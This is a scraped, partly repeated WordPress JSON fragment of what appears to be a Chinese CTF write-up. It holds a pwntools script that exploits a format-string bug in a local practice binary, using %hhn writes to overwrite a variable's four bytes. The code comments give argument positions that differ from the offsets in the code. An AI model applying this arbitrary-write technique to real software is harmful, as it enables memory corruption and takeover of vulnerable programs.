209,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/192\/revisions\/209"}],"wp:attachment":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/media?parent=192"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/categories?post=192"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/tags?post=192"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
from pwn import *\n\ncontext.arch = 'i386'\ncontext.log_level = 'debug'\n\ndef exploit_c():\n p = process('.\/test2')\n\n c_addr = 0x804c030 # \u66ff\u6362\u4e3a\u5b9e\u9645\u5730\u5740\n\n # \u6784\u9020payload\uff1a\u5206\u56db\u6b21\u5199\u5165\uff08\u5206\u522b\u8986\u76d6c\u7684\u56db\u4e2a\u5b57\u8282\uff09\n # \u76ee\u6807\u503c\uff1ac = 0x12345678 \u2192 \u5206\u89e3\u4e3a\u56db\u4e2a\u5355\u5b57\u8282\uff1a0x78, 0x56, 0x34, 0x12\n payload = p32(c_addr) + p32(c_addr+1) + p32(c_addr+2) + p32(c_addr+3)\n \n # \u8ba1\u7b97\u5404\u5b57\u8282\u7684\u5b57\u7b26\u6570\uff08\u6ce8\u610f\u987a\u5e8f\u4e3a\u5c0f\u7aef\u5e8f\uff09\uff1a\n # 0x78 - 16\uff08\u5df2\u5199\u516516\u5b57\u8282\uff09 = 0x78 - 0x10 = 104 \u2192 \"%104c\"\n # 0x56 - 0x78 = 0xDE (222) \u2192 \u9700\u8865\u52300x156 \u2192 222 \u2192 \"%222c\"\n # 0x34 - 0x56 = 0xDE (222) \u2192 \"%222c\"\n # 0x12 - 0x34 = 0xDE (222) \u2192 \"%222c\"\n payload += b\"%104c%7$hhn\" # \u8986\u76d6c_addr\uff08\u7b2c6\u4e2a\u53c2\u6570\uff09\n payload += b\"%222c%8$hhn\" # \u8986\u76d6c_addr+1\uff08\u7b2c7\u4e2a\u53c2\u6570\uff09\n payload += b\"%222c%9$hhn\" # \u8986\u76d6c_addr+2\uff08\u7b2c8\u4e2a\u53c2\u6570\uff09\n payload += b\"%222c%10$hhn\" # \u8986\u76d6c_addr+3\uff08\u7b2c9\u4e2a\u53c2\u6570\uff09\n \n # \u68c0\u67e5payload\u957f\u5ea6\uff08\u5fc5\u987b \u2264100\uff09\n assert len(payload) <= 100, f\"Payload\u8fc7\u957f: {len(payload)}\u5b57\u8282\"\n\n p.sendline(payload)\n \n # \u63a5\u6536\u8f93\u51fa\u5e76\u9a8c\u8bc1\n output = p.recvall(timeout=2)\n print(output)\n\nexploit_c()<\/code><\/pre>\n\n\n\n\u8fd0\u884c\u7ed3\u679c\u5982\u4e0b<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u989d\u989d\u989d\u867d\u7136\u8f93\u51fa\u5f88\u6f66\u8349\uff08printf\u8f93\u51fa\u7684\u6742\u4e71\u4e1c\u897f\u592a\u591a\u4e86\uff09\uff0c\u4f46\u662f\u8fd8\u662f\u80fd\u5728\u6700\u540e\u770b\u5230\u6211\u4eec\u60f3\u8981\u7684\u7ed3\u679c\uff0c\u641e\u5b9a\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"\u9898\u76ee\u5982\u4e0b \u5229\u7528\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u5b9e\u73b0\u4efb\u610f\u5730\u5740\u8986\u76d6 \u8981\u6c42\uff1a\u4f7f\u7528pwntools\u5b9e\u73b03\u6bb5\u4ee3\u7801\uff0c\u5206\u522b\u5229\u7528\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u8986\u76d6a\uff0cb\uff0cc\u4e09\u4e2a …<\/p>","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3,4],"tags":[],"class_list":["post-192","post","type-post","status-publish","format-standard","hentry","category-ctf","category-4"],"_links":{"self":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/192","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/comments?post=192"}],"version-history":[{"count":4,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/192\/revisions"}],"predecessor-version":[{"id":209,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/192\/revisions\/209"}],"wp:attachment":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/media?parent=192"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/categories?post=192"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/tags?post=192"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
\u8fd0\u884c\u7ed3\u679c\u5982\u4e0b<\/p>\n\n\n\n<\/figure >\n<\/figure><\/noscript>\n\n\n\n\u989d\u989d\u989d\u867d\u7136\u8f93\u51fa\u5f88\u6f66\u8349\uff08printf\u8f93\u51fa\u7684\u6742\u4e71\u4e1c\u897f\u592a\u591a\u4e86\uff09\uff0c\u4f46\u662f\u8fd8\u662f\u80fd\u5728\u6700\u540e\u770b\u5230\u6211\u4eec\u60f3\u8981\u7684\u7ed3\u679c\uff0c\u641e\u5b9a\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"\u9898\u76ee\u5982\u4e0b \u5229\u7528\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u5b9e\u73b0\u4efb\u610f\u5730\u5740\u8986\u76d6 \u8981\u6c42\uff1a\u4f7f\u7528pwntools\u5b9e\u73b03\u6bb5\u4ee3\u7801\uff0c\u5206\u522b\u5229\u7528\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u8986\u76d6a\uff0cb\uff0cc\u4e09\u4e2a …<\/p>","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3,4],"tags":[],"class_list":["post-192","post","type-post","status-publish","format-standard","hentry","category-ctf","category-4"],"_links":{"self":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/192","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/comments?post=192"}],"version-history":[{"count":4,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/192\/revisions"}],"predecessor-version":[{"id":209,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/192\/revisions\/209"}],"wp:attachment":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/media?parent=192"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/categories?post=192"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/tags?post=192"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
\u989d\u989d\u989d\u867d\u7136\u8f93\u51fa\u5f88\u6f66\u8349\uff08printf\u8f93\u51fa\u7684\u6742\u4e71\u4e1c\u897f\u592a\u591a\u4e86\uff09\uff0c\u4f46\u662f\u8fd8\u662f\u80fd\u5728\u6700\u540e\u770b\u5230\u6211\u4eec\u60f3\u8981\u7684\u7ed3\u679c\uff0c\u641e\u5b9a\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"
\u9898\u76ee\u5982\u4e0b \u5229\u7528\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u5b9e\u73b0\u4efb\u610f\u5730\u5740\u8986\u76d6 \u8981\u6c42\uff1a\u4f7f\u7528pwntools\u5b9e\u73b03\u6bb5\u4ee3\u7801\uff0c\u5206\u522b\u5229\u7528\u683c\u5f0f\u5316\u5b57\u7b26\u4e32\u6f0f\u6d1e\u8986\u76d6a\uff0cb\uff0cc\u4e09\u4e2a …<\/p>","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3,4],"tags":[],"class_list":["post-192","post","type-post","status-publish","format-standard","hentry","category-ctf","category-4"],"_links":{"self":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/192","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/comments?post=192"}],"version-history":[{"count":4,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/192\/revisions"}],"predecessor-version":[{"id":209,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/posts\/192\/revisions\/209"}],"wp:attachment":[{"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/media?parent=192"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/categories?post=192"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.xtmouse.top\/index.php\/wp-json\/wp\/v2\/tags?post=192"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
![\"\"](\"http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-5.png\")
![\"\"](\"https:\/\/cdn.jsdelivr.net\/gh\/moezx\/cdn@3.0.2\/img\/svg\/loader\/trans.ajax-spinner-preloader.svg\")
![\"\"](\"http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-6.png\")
![\"\"](\"http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-7-1024x395.png\")
![\"\"](\"http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-4.gif\")
![\"\"](\"http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-1.gif\")
![\"\"](\"http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image.png\")
![\"\"](\"http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-1.png\")
![\"\"](\"http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-2.png\")
![\"\"](\"http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-3.png\")
![\"\"](\"http:\/\/www.xtmouse.top\/wp-content\/uploads\/2025\/04\/image-4.png\")